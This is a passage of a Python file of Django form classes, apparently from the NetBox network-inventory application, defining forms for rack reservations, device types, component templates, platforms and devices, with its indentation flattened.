nullable_fields = []
class RackReservationFilterForm(BootstrapMixin, TenancyFilterForm):
model = RackReservation
field_order = ['q', 'region', 'site', 'group_id', 'user_id', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.prefetch_related('site'),
required=False,
label='Rack group',
null_option='None'
)
user_id = DynamicModelMultipleChoiceField(
queryset=User.objects.all(),
required=False,
display_field='username',
label='User',
widget=APISelectMultiple(
api_url='/api/users/users/',
)
)
tag = TagFilterField(model)
#
# Manufacturers
#
class ManufacturerForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Manufacturer
fields = [
'name', 'slug', 'description',
]
class ManufacturerCSVForm(CSVModelForm):
class Meta:
model = Manufacturer
fields = Manufacturer.csv_headers
#
# Device types
#
class DeviceTypeForm(BootstrapMixin, CustomFieldModelForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all()
)
slug = SlugField(
slug_source='model'
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = DeviceType
fields = [
'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
'front_image', 'rear_image', 'comments', 'tags',
]
widgets = {
'subdevice_role': StaticSelect2(),
# Exclude SVG images (unsupported by PIL)
'front_image': forms.FileInput(attrs={
'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
}),
'rear_image': forms.FileInput(attrs={
'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
})
}
class DeviceTypeImportForm(BootstrapMixin, forms.ModelForm):
manufacturer = forms.ModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name'
)
class Meta:
model = DeviceType
fields = [
'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
'comments',
]
class DeviceTypeBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceType.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
u_height = forms.IntegerField(
min_value=1,
required=False
)
is_full_depth = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect(),
label='Is full depth'
)
class Meta:
nullable_fields = []
class DeviceTypeFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = DeviceType
q = forms.CharField(
required=False,
label='Search'
)
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False
)
subdevice_role = forms.MultipleChoiceField(
choices=add_blank_choice(SubdeviceRoleChoices),
required=False,
widget=StaticSelect2Multiple()
)
console_ports = forms.NullBooleanField(
required=False,
label='Has console ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_server_ports = forms.NullBooleanField(
required=False,
label='Has console server ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_ports = forms.NullBooleanField(
required=False,
label='Has power ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_outlets = forms.NullBooleanField(
required=False,
label='Has power outlets',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
interfaces = forms.NullBooleanField(
required=False,
label='Has interfaces',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
pass_through_ports = forms.NullBooleanField(
required=False,
label='Has pass-through ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Device component templates
#
class ComponentTemplateCreateForm(ComponentForm):
"""
Base form for the creation of device component templates (subclassed from ComponentTemplateModel).
"""
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
initial_params={
'device_types': 'device_type'
}
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
description = forms.CharField(
required=False
)
class ConsolePortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ConsolePortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class ConsolePortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
widget=StaticSelect2()
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsolePortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=ConsolePortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
class Meta:
nullable_fields = ('label', 'type', 'description')
class ConsoleServerPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ConsoleServerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class ConsoleServerPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
widget=StaticSelect2()
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsoleServerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=ConsoleServerPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'description')
class PowerPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = PowerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class PowerPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum power draw (watts)"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated power draw (watts)"
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw',
'description',
)
class PowerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False,
widget=StaticSelect2()
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum power draw (watts)"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated power draw (watts)"
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'maximum_draw', 'allocated_draw', 'description')
class PowerOutletTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = PowerOutletTemplate
fields = [
'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port choices to current DeviceType
if hasattr(self.instance, 'device_type'):
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
device_type=self.instance.device_type
)
class PowerOutletTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False
)
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False,
widget=StaticSelect2()
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg',
'description',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port choices to current DeviceType
device_type = DeviceType.objects.get(
pk=self.initial.get('device_type') or self.data.get('device_type')
)
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
device_type=device_type
)
class PowerOutletTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerOutletTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
device_type = forms.ModelChoiceField(
queryset=DeviceType.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False,
widget=StaticSelect2()
)
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'power_port', 'feed_leg', 'description')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port queryset to PowerPortTemplates which belong to the parent DeviceType
if 'device_type' in self.initial:
device_type = DeviceType.objects.filter(pk=self.initial['device_type']).first()
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(device_type=device_type)
else:
self.fields['power_port'].choices = ()
self.fields['power_port'].widget.attrs['disabled'] = True
class InterfaceTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = InterfaceTemplate
fields = [
'device_type', 'name', 'label', 'type', 'mgmt_only', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'type': StaticSelect2(),
}
class InterfaceTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices,
widget=StaticSelect2()
)
mgmt_only = forms.BooleanField(
required=False,
label='Management only'
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'mgmt_only', 'description')
class InterfaceTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=InterfaceTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(InterfaceTypeChoices),
required=False,
widget=StaticSelect2()
)
mgmt_only = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Management only'
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'description')
class FrontPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = FrontPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'rear_port': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit rear_port choices to current DeviceType
if hasattr(self.instance, 'device_type'):
self.fields['rear_port'].queryset = RearPortTemplate.objects.filter(
device_type=self.instance.device_type
)
class FrontPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2()
)
rear_port_set = forms.MultipleChoiceField(
choices=[],
label='Rear ports',
help_text='Select one rear port assignment for each front port being created.',
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
device_type = DeviceType.objects.get(
pk=self.initial.get('device_type') or self.data.get('device_type')
)
# Determine which rear port positions are occupied. These will be excluded from the list of available mappings.
occupied_port_positions = [
(front_port.rear_port_id, front_port.rear_port_position)
for front_port in device_type.frontporttemplates.all()
]
# Populate rear port choices
choices = []
rear_ports = RearPortTemplate.objects.filter(device_type=device_type)
for rear_port in rear_ports:
for i in range(1, rear_port.positions + 1):
if (rear_port.pk, i) not in occupied_port_positions:
choices.append(
('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
)
self.fields['rear_port_set'].choices = choices
def clean(self):
super().clean()
# Validate that the number of ports being created equals the number of selected (rear port, position) tuples
front_port_count = len(self.cleaned_data['name_pattern'])
rear_port_count = len(self.cleaned_data['rear_port_set'])
if front_port_count != rear_port_count:
raise forms.ValidationError({
'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
'were selected. These counts must match.'.format(front_port_count, rear_port_count)
})
def get_iterative_data(self, iteration):
# Assign rear port and position from selected set
rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
return {
'rear_port': int(rear_port),
'rear_port_position': int(position),
}
class FrontPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=FrontPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('description',)
class RearPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = RearPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'positions', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
'type': StaticSelect2(),
}
class RearPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
positions = forms.IntegerField(
min_value=REARPORT_POSITIONS_MIN,
max_value=REARPORT_POSITIONS_MAX,
initial=1,
help_text='The number of front ports which may be mapped to each rear port'
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'positions', 'description')
class RearPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=RearPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('description',)
class DeviceBayTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = DeviceBayTemplate
fields = [
'device_type', 'name', 'label', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class DeviceBayTemplateCreateForm(ComponentTemplateCreateForm):
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'description')
class DeviceBayTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceBayTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'description')
#
# Component template import forms
#
class ComponentTemplateImportForm(BootstrapMixin, forms.ModelForm):
def __init__(self, device_type, data=None, *args, **kwargs):
# Must pass the parent DeviceType on form initialization
data.update({
'device_type': device_type.pk,
})
super().__init__(data, *args, **kwargs)
def clean_device_type(self):
data = self.cleaned_data['device_type']
# Limit fields referencing other components to the parent DeviceType
for field_name, field in self.fields.items():
if isinstance(field, forms.ModelChoiceField) and field_name != 'device_type':
field.queryset = field.queryset.filter(device_type=data)
return data
class ConsolePortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = ConsolePortTemplate
fields = [
'device_type', 'name', 'label', 'type',
]
class ConsoleServerPortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = ConsoleServerPortTemplate
fields = [
'device_type', 'name', 'label', 'type',
]
class PowerPortTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = PowerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw',
]
class PowerOutletTemplateImportForm(ComponentTemplateImportForm):
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = PowerOutletTemplate
fields = [
'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg',
]
class InterfaceTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices.CHOICES
)
class Meta:
model = InterfaceTemplate
fields = [
'device_type', 'name', 'label', 'type', 'mgmt_only',
]
class FrontPortTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=PortTypeChoices.CHOICES
)
rear_port = forms.ModelChoiceField(
queryset=RearPortTemplate.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = FrontPortTemplate
fields = [
'device_type', 'name', 'type', 'rear_port', 'rear_port_position',
]
class RearPortTemplateImportForm(ComponentTemplateImportForm):
type = forms.ChoiceField(
choices=PortTypeChoices.CHOICES
)
class Meta:
model = RearPortTemplate
fields = [
'device_type', 'name', 'type', 'positions',
]
class DeviceBayTemplateImportForm(ComponentTemplateImportForm):
class Meta:
model = DeviceBayTemplate
fields = [
'device_type', 'name',
]
#
# Device roles
#
class DeviceRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = DeviceRole
fields = [
'name', 'slug', 'color', 'vm_role', 'description',
]
class DeviceRoleCSVForm(CSVModelForm):
slug = SlugField()
class Meta:
model = DeviceRole
fields = DeviceRole.csv_headers
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
#
# Platforms
#
class PlatformForm(BootstrapMixin, forms.ModelForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
slug = SlugField(
max_length=64
)
class Meta:
model = Platform
fields = [
'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description',
]
widgets = {
'napalm_args': SmallTextarea(),
}
class PlatformCSVForm(CSVModelForm):
slug = SlugField()
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
to_field_name='name',
help_text='Limit platform assignments to this manufacturer'
)
class Meta:
model = Platform
fields = Platform.csv_headers
#
# Devices
#
class DeviceForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site'
},
initial_params={
'racks': '$rack'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
required=False,
display_field='display_name',
query_params={
'site_id': '$site',
'group_id': '$rack_group',
}
)
position = forms.IntegerField(
required=False,
help_text="The lowest-numbered unit occupied by the device",
widget=APISelect(
api_url='/api/dcim/racks/{{rack}}/elevation/',
attrs={
'disabled-indicator': 'device',
'data-query-param-face': "[\"$face\"]",
}
)
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
initial_params={
'device_types': '$device_type'
}
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
device_role = DynamicModelChoiceField(
queryset=DeviceRole.objects.all()
)
platform = DynamicModelChoiceField(
queryset=Platform.objects.all(),
required=False,
query_params={
'manufacturer_id': ['$manufacturer', 'null']
}
)
cluster_group = DynamicModelChoiceField(
queryset=ClusterGroup.objects.all(),
required=False,
null_option='None',
initial_params={
'clusters': '$cluster'
}
)
cluster = DynamicModelChoiceField(
queryset=Cluster.objects.all(),
required=False,
query_params={
'group_id': '$cluster_group'
}
)
comments = CommentField()
local_context_data = JSONField(
required=False,
label=''
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Device
fields = [
'name', 'device_role', 'device_type', 'serial', 'asset_tag', 'site', 'rack', 'position', 'face',
'status', 'platform', 'primary_ip4', 'primary_ip6', 'cluster_group', 'cluster', 'tenant_group', 'tenant',
'comments', 'tags', 'local_context_data'
]
help_texts = {
'device_role': "The function this device serves",
'serial': "Chassis serial number",
'local_context_data': "Local config context data overwrites all source contexts in the final rendered "
"config context",
}
widgets = {
'face': StaticSelect2(),
'status': StaticSelect2(),
'primary_ip4': StaticSelect2(),
'primary_ip6': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.instance.pk:
# Compile list of choices for primary IPv4 and IPv6 addresses
for family in [4, 6]:
ip_choices = [(None, '---------')]
# Gather PKs of all interfaces belonging to this Device or a peer VirtualChassis member
interface_ids = self.instance.vc_interfaces.values_list('pk', flat=True)
# Collect interface IPs
interface_ips = IPAddress.objects.filter(
address__family=family,
assigned_object_type=ContentType.objects.get_for_model(Interface),
assigned_object_id__in=interface_ids
).prefetch_related('assigned_object')
if interface_ips:
ip_list = [(ip.id, f'{ip.address} ({ip.assigned_object})') for ip in interface_ips]
ip_choices.append(('Interface IPs', ip_list))
# Collect NAT IPs
nat_ips = IPAddress.objects.prefetch_related('nat_inside').filter(
address__family=family,
nat_inside__assigned_object_type=ContentType.objects.get_for_model(Interface),
nat_inside__assigned_object_id__in=interface_ids
).prefetch_related('assigned_object')
if nat_ips:
ip_list = [(ip.id, f'{ip.address} (NAT)') for ip in nat_ips]
ip_choices.append(('NAT IPs', ip_list))
self.fields['primary_ip{}'.format(family)].choices = ip_choices
# If editing an existing device, exclude it from the list of occupied rack units. This ensures that a device
# can be flipped from one face to another.
self.fields['position'].widget.add_query_param('exclude', self.instance.pk)
# Limit platform by manufacturer
self.fields['platform'].queryset = Platform.objects.filter(
Q(manufacturer__isnull=True) | Q(manufacturer=self.instance.device_type.manufacturer)
)
# Disable rack assignment if this is a child device installed in a parent device
if self.instance.device_type.is_child_device and hasattr(self.instance, 'parent_bay'):
self.fields['site'].disabled = True
self.fields['rack'].disabled = True
self.initial['site'] = self.instance.parent_bay.device.site_id
self.initial['rack'] = self.instance.parent_bay.device.rack_id
else:
# An object that doesn't exist yet can't have any IPs assigned to it
self.fields['primary_ip4'].choices = []
self.fields['primary_ip4'].widget.attrs['readonly'] = True
self.fields['primary_ip6'].choices = []
self.fields['primary_ip6'].widget.attrs['readonly'] = True
# Rack position
position = self.data.get('position') or self.initial.get('position')
if position:
self.fields['position'].widget.choices = [(position, f'U{position}')]
class BaseDeviceCSVForm(CustomFieldModelCSVForm):
device_role = CSVModelChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='name',
help_text='Assigned role'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name',
help_text='Device type manufacturer'
)
device_type = CSVModelChoiceField(
queryset=DeviceType.objects.all(),
to_field_name='model',
help_text='Device type model'
)
platform = CSVModelChoiceField(
queryset=Platform.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned platform'
)
status = CSVChoiceField(
choices=DeviceStatusChoices,
help_text='Operational status'
)
cluster = CSVModelChoiceField(
queryset=Cluster.objects.all(),
to_field_name='name',
required=False,
help_text='Virtualization cluster'
)
class Meta:
fields = []
model = Device
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit device type queryset by manufacturer
params = {f"manufacturer__{self.fields['manufacturer'].to_field_name}": data.get('manufacturer')}
self.fields['device_type'].queryset = self.fields['device_type'].queryset.filter(**params)
class DeviceCSVForm(BaseDeviceCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
required=False,
help_text="Assigned rack"
)
face = CSVChoiceField(
choices=DeviceFaceChoices,
required=False,
help_text='Mounted rack face'
)
class Meta(BaseDeviceCSVForm.Meta):
fields = [
'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
'site', 'rack_group', 'rack', 'position', 'face', 'cluster', 'comments',
]
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit rack_group queryset by assigned site
params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by assigned site and group
params = {
f"site__{self.fields['site'].to_field_name}": data.get('site'),
f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class ChildDeviceCSVForm(BaseDeviceCSVForm):
parent = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Parent device'
)
device_bay = CSVModelChoiceField(
queryset=DeviceBay.objects.all(),
to_field_name='name',
help_text='Device bay in which this device is installed'
)
class Meta(BaseDeviceCSVForm.Meta):
fields = [
'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
'parent', 'device_bay', 'cluster', 'comments',
]
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit device bay queryset by parent device
params = {f"device__{self.fields['parent'].to_field_name}": data.get('parent')}
self.fields['device_bay'].queryset = self.fields['device_bay'].queryset.filter(**params)
def clean(self):
super().clean()
# Set parent_bay reverse relationship
device_bay = self.cleaned_data.get('device_bay')
if device_bay:
self.instance.parent_bay = device_bay
# Inherit site and rack from parent device
parent = self.cleaned_data.get('parent')
if parent:
self.instance.site = parent.site
self.instance.rack = parent.rack
class DeviceBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
required=False,
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
device_role = DynamicModelChoiceField(
queryset=DeviceRole.objects.all(),
required=False
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
platform = DynamicModelChoiceField(
queryset=Platform.objects.all(),
required=False
)
status = forms.ChoiceField(
choices=add_blank_choice(DeviceStatusChoices),
required=False,
widget=StaticSelect2()
)
serial = forms.CharField(
max_length=50,
required=False,
label='Serial Number'
)
class Meta:
nullable_fields = [
'tenant', 'platform', 'serial',
]
class DeviceFilterForm(BootstrapMixin, LocalConfigContextFilterForm, TenancyFilterForm, CustomFieldFilterForm):
model = Device
field_order = [
'q', 'region', 'site', 'rack_group_id', 'rack_id', 'status', 'role', 'tenant_group', 'tenant',
'manufacturer_id', 'device_type_id', 'mac_address', 'has_primary_ip',
]
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
rack_group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group',
query_params={
'site': '$site'
}
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site',
'group_id': '$rack_group_id',
}
)
role = DynamicModelMultipleChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='slug',
required=False
)
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False,
label='Manufacturer'
)
device_type_id = DynamicModelMultipleChoiceField(
queryset=DeviceType.objects.all(),
required=False,
label='Model',
display_field='model',
query_params={
'manufacturer': '$manufacturer'
}
)
platform = DynamicModelMultipleChoiceField(
queryset=Platform.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
status = forms.MultipleChoiceField(
choices=DeviceStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
mac_address = forms.CharField(
required=False,
label='MAC address'
)
has_primary_ip = forms.NullBooleanField(
required=False,
label='Has a primary IP',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
virtual_chassis_member = forms.NullBooleanField(
required=False,
label='Virtual chassis member',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_ports = forms.NullBooleanField(
required=False,
label='Has console ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_server_ports = forms.NullBooleanField(
required=False,
label='Has console server ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_ports = forms.NullBooleanField(
required=False,
label='Has power ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_outlets = forms.NullBooleanField(
required=False,
label='Has power outlets',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
interfaces = forms.NullBooleanField(
required=False,
label='Has interfaces',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
pass_through_ports = forms.NullBooleanField(
required=False,
label='Has pass-through ports',
widget=StaticSelect2(
